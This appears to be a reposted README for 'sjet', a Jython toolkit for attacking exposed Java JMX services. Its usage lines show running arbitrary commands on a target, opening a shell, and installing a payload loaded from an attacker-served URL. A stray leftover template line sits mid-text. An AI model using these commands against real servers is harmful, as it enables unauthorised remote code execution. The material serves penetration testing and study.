sjet is A JMX exploitation toolkit.
what is a Java Management Extensions(JMX):
Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean). In the API, classes can be dynamically loaded and instantiated. Managing and monitoring applications can be designed and developed using the Java Dynamic Management Kit.
Prerequisites:
+ Java 7-8
+ Jython 2.7 http://www.jython.org/
SJET implements a CLI interface (using argparse):
Where
– targetHost – the target IP address
– targerPort – the target port where JMX is running
– MODE – the script mode
– modeOptions – the options for the mode selected
Modes and modeOptions
+-+ install – installs the payload in the current target.
+-+-+ payload_url – full URL to load the payload
+-+-+ payload_port – port to load the payload
command – runs the command CMD in the targetHost
+-+-+ CMD – the command to run
+-+ javascript – runs a javascript file FILENAME in the targetHost
+-+-+ FILENAME – the javascript to be run
+-+ shell – starts a simple shell in targetHost (with the limitations of java’s Runtime.exec())
Explain how to run the automated tests for this system
Usage:
git clone https://github.com/h0ng10/sjet && cd sjet jython sjet.py 192.168.56.101 8008 command "dir" Installing the payload in a Windows target: jython sjet.py 192.168.56.101 8008 install http://192.168.56.1 8888
Source: https://github.com/h0ng10